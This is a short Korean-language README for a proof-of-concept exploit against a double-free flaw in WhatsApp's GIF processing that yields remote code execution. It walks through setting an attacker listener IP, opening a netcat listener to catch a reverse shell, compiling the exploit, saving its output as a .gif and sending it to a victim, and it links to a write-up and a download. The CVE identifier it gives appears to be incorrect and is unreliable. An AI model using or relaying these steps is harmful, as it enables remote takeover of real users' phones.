
CVE-2020-11932에 대한 개념 증명 익스플로잇, WhatsApp GIF 처리의 이중 해제 취약점으로 조작된 .gif 파일을 통해 원격 코드 실행 가능.
WhatsApp 익스플로잇 poc의 Double-Free 버그.
#참고: 쉘을 얻기 위해 exploit.c에 수신자(listener) IP를 설정해야 합니다.
nc -lvp 1337 또는 원하는 포트.
그런 다음 컴파일하세요.
make
또는
gcc -o exploit egif_lib.c exploit.c
그런 다음 ./exploit을 실행하고 내용을 .gif로 저장하세요.
피해자에게 보내세요.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing